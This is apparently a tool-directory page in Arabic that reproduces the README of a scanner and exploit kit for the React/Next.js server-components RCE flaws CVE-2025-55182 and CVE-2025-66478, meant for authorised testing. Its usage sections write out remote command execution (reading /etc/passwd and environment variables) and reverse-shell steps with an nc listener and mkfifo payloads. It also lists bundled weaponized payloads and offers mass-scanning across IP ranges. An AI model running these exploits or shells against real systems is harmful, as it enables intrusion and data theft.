Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react2shell-scanner-CVE-2025-55182 — React2shell-web-scanner | Kitploit
أدوات/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
إدارة مؤشرات الاختراق (IOC)ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباستخبارات التهديداتتعداد النطاقات الفرعيةالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

عرض المستودع
25منذ 8 أشهرلم تتم المراجعة بعد
مشاركة

ماسح React2Shell للمؤسسات

ماسح ثغرات عالي الدقة لـ CVE-2025-55182 وCVE-2025-66478 - ثغرات تنفيذ التعليمات البرمجية عن بُعد (RCE) في مكونات خادم React / Next.js.

📖 للتحليل التقني المفصل وآليات الاستغلال وبيانات مؤشرات الاختراق (IOC)، راجع SECURITY-RESEARCH.md


⚠️ إخلاء مسؤولية

تُوفَّر هذه الأداة لأغراض التعليم واختبار الأمان المصرَّح به فقط. الوصول غير المصرَّح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأدوات فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.


🚨 نظرة عامة على الثغرات

CVEالوصفCVSS
CVE-2025-55182ثغرة RCE عبر إلغاء التسلسل غير الآمن في مكونات خادم React9.8 حرجة
CVE-2025-66478ثغرة RCE في إجراءات خادم Next.js9.8 حرجة

الحزم المتأثرة:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

الإصدارات المُصحَّحة:

  • 19.0.1, 19.1.2, 19.2.1 (لجميع الحزم)

✨ الميزات

  • إدخال متعدد الأهداف: عنوان URL واحد، ملفات مضيفين، نطاقات CIDR، نطاقات IP
  • عدّ النطاقات الفرعية: اكتشاف تلقائي للنطاقات الفرعية
  • بصمة التقنية: اكتشاف Next.js قبل الاختبار
  • وضع الكشف الآمن: كشف عبر القناة الجانبية دون تنفيذ تعليمات برمجية
  • التحقق من RCE: إثبات مفهوم قائم على الحسابات الرياضية
  • ربط مؤشرات الاختراق (IOC): الفحص مقابل البنية التحتية الخبيثة المعروفة
  • تكامل Phoenix Security: رفع النتائج إلى منصة Phoenix
  • الفحص المتزامن: متعدد الخيوط للتوسّع

📦 التثبيت

باستخدام uv (موصى به)

root@kitploit:~
# No installation needed - uv handles dependencies
uv run react2shell-scanner -u https://example.com

باستخدام pip

root@kitploit:~
pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 الاستخدام

الفحص الأساسي

root@kitploit:~
# Single URL
python3 react2shell-scanner -u https://example.com

# Safe mode (no RCE execution)
python3 react2shell-scanner -u https://example.com --safe-check

# From host file
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# CIDR range
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# Multiple CIDR ranges
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

الفحص المتقدم

root@kitploit:~
# Subdomain enumeration
python3 react2shell-scanner -u example.com --enumerate-subdomains

# Custom subdomain wordlist
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# Custom paths
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# Skip fingerprinting (scan everything)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# Verbose with SSL disabled
python3 react2shell-scanner -u https://example.com -k -v

تكامل Phoenix Security

root@kitploit:~
# Upload findings to Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# Debug mode (save payloads)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# Upload all results (not just vulnerabilities)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 الإعداد

إعداد Phoenix Security

أنشئ ملف .phoenix.config:

root@kitploit:~
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

أو استخدم متغيرات البيئة:

root@kitploit:~
export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 مختبر الاختبار

تتضمن الأداة بيئة اختبار قائمة على Docker. راجع Lab-instructions-sample.md للرجوع السريع.

root@kitploit:~
# Start lab
cd test-lab/lab
docker-compose up -d

# Services:
# - Vulnerable: http://localhost:3011
# - Patched:    http://localhost:3012

# Test vulnerable instance (safe evidence collection)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# Test patched instance  
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# Run full demo
./test-and-demo.sh --full-demo

⚠️ ملاحظة: أوامر الاستغلال (مثل exploit.py -c "whoami") تؤدي إلى تنفيذ RCE فعلي. استخدمها فقط على حاويات Docker المحلية لأغراض البحث.

💻 أداة الاستغلال (exploit.py)

تنفيذ أوامر على الأهداف المعرَّضة للخطر. تتطلب Python 3.11+

التثبيت

root@kitploit:~
cd test-lab
pip3.11 install -r requirements.txt
# Or: pip3.11 install rich-click fake-useragent rich requests

أمثلة على تنفيذ الأوامر

root@kitploit:~
# Basic command execution
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Output: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Output: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Output: 99e28775bf80 (container ID)

# System enumeration
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# Application reconnaissance
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Output: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# Network information
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# Process enumeration
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

القشرة العكسية (متقدم)

root@kitploit:~
# Get Docker network gateway
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# Start listener (in another terminal)
nc -lvnp 4444

# Launch reverse shell
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# Available payload types: nc, nc-mkfifo, sh, bash, perl

خيارات الاستغلال

📊 صيغ المخرجات

مخرجات وحدة التحكم

root@kitploit:~
[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 matches known malicious infrastructure
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com

مخرجات JSON

root@kitploit:~
{
  "scan_time": "2025-12-08T10:00:00Z",
  "scanner": "React2Shell Scanner v2.0",
  "cves": ["CVE-2025-55182", "CVE-2025-66478"],
  "total_scanned": 100,
  "vulnerable_count": 3,
  "ioc_matches": 1,
  "results": [
    {
      "target": "https://vulnerable.example.com",
      "ip": "203.0.113.50",
      "fqdn": "vulnerable.example.com",
      "verdict": "VULNERABLE",
      "vulnerable": true,
      "nextjs_detected": true,
      "detection_method": "rce_arithmetic_check"
    }
  ]
}

🔍 ربط مؤشرات الاختراق (IOC)

يتضمن الماسح مؤشرات اختراق (IOC) معروفة من حملات الاستغلال النشطة:

  • 32 عنوان IP خبيث من payloads-exploits/iocs.csv
  • حمولات مسلَّحة من payloads-exploits/weaponized-payloads
  • مؤشرات IOC موسّعة تشمل النطاقات وعناوين URL وتجزئات الملفات ومحافظ العملات المشفرة في payloads-exploits/iocs_patterns.csv

يتم الإبلاغ عن التطابقات مع مؤشرات IOC بدرجة خطورة عالية.

ملفات IOC

الملفالمحتويات
iocs.csv32 عنوان IP خبيث معروف مع بيانات الموقع الجغرافي

🛡️ طرق الكشف

الفحص الآمن عبر القناة الجانبية (--safe-check)

  • يرسل حمولة غير صالحة تؤدي إلى استجابة خطأ
  • لا ينفّذ تعليمات برمجية على الهدف
  • يكتشف ما إذا كان الهدف يعاني من إلغاء تسلسل غير آمن
  • موصى به للاستطلاع السلبي

فحص RCE الحسابي (افتراضي)

  • يرسل حمولة تنفّذ echo $((41*271))
  • يتحقق من أن الاستجابة تحتوي على النتيجة المحسوبة (11111)
  • يؤكد القدرة الفعلية على تنفيذ التعليمات البرمجية
  • استخدمه فقط على الأهداف المصرَّح بها

📁 هيكل المشروع

root@kitploit:~
react2shell-scanner-CVE-2025-55182/
├── react2shell-scanner          # Main scanner script
├── cve-2025-66478-web-scan     # Original scanner reference
├── nuclei-rules                 # Nuclei template
├── test-and-demo.sh            # Test automation
├── README.md                    # This file
├── SECURITY-RESEARCH.md         # Detailed technical analysis
├── Lab-instructions-sample.md   # Quick lab testing guide
├── payloads-exploits/
│   ├── iocs.csv                 # Known malicious IPs
│   ├── iocs_patterns.csv        # Extended IOCs (domains, URLs, hashes)
│   ├── weaponized-payloads      # Real-world attack payloads
│   └── exploit-2025-55182       # Raw HTTP exploit request
└── test-lab/
    ├── exploit.py               # Exploitation tool
    ├── lab/
    │   ├── docker-compose.yml
    │   ├── vulnerable/          # Vulnerable Next.js app
    │   └── patched/             # Patched Next.js app
    └── packages/
        ├── vulnerable/          # Vulnerable npm packages
        └── patched/             # Patched npm packages

🔗 المستودعات ذات الصلة

المستودعالغرض
react2shell-scanner-CVE-2025-55182المختبرات والماسح وأدوات الاستغلال (هذا المستودع)
react2shell-scanner-rce-react-nextماسح كامل بواجهة ويب

⚠️ إخلاء المسؤولية القانوني

تُوفَّر هذه الأداة لاختبار الأمان المصرَّح به فقط. يجب أن يكون لديك إذن كتابي صريح قبل فحص أي هدف. قد يُعد الفحص غير المصرَّح به انتهاكًا لقوانين جرائم الكمبيوتر.

استخدمها بمسؤولية:

  • افحص فقط الأنظمة التي تملكها أو لديك تصريح لاختبارها
  • وثّق تفويضك
  • أبلغ عن الثغرات عبر القنوات المناسبة
  • اتبع ممارسات الإفصاح المسؤول

📚 المراجع

  • النشرة الأمنية CVE-2025-55182
  • مدونة React الأمنية
  • النشرة الأمنية لـ Next.js GHSA-9qr9-h5gf-34mp
  • سجل تغييرات Vercel
  • أبحاث Assetnote

🙏 الاعتمادات

  • فريق أبحاث الأمان في Assetnote - البحث الأصلي عن الثغرات
  • Chocapikk - تطوير أداة الاستغلال
  • Phoenix Security - تكامل المنصة

مقدَّم لك من باحثين أمنيين يعملون على جعل الويب أكثر أمانًا.

تنزيل الأداة
الخيارالوصف
-u, --urlعنوان URL المستهدف (مطلوب)
-c, --cmdالأمر المطلوب تنفيذه
-r, --reverseتفعيل وضع القشرة العكسية
-l, --lhostمضيف المستمع للقشرة العكسية
-p, --lportمنفذ المستمع للقشرة العكسية
-P, --payloadنوع الحمولة: nc, nc-mkfifo, sh, bash, perl
--timeoutمهلة الطلب (الافتراضي: 10 ثوانٍ)
iocs_patterns.csvمؤشرات IOC موسّعة: نطاقات C2 وعناوين URL للمُحمِّلات وتجزئات برمجيات خبيثة ومحافظ Monero
weaponized-payloadsحمولات هجوم من العالم الحقيقي رُصدت في استغلال نشط
exploit-2025-55182صيغة طلب HTTP الخام لاستغلال الثغرة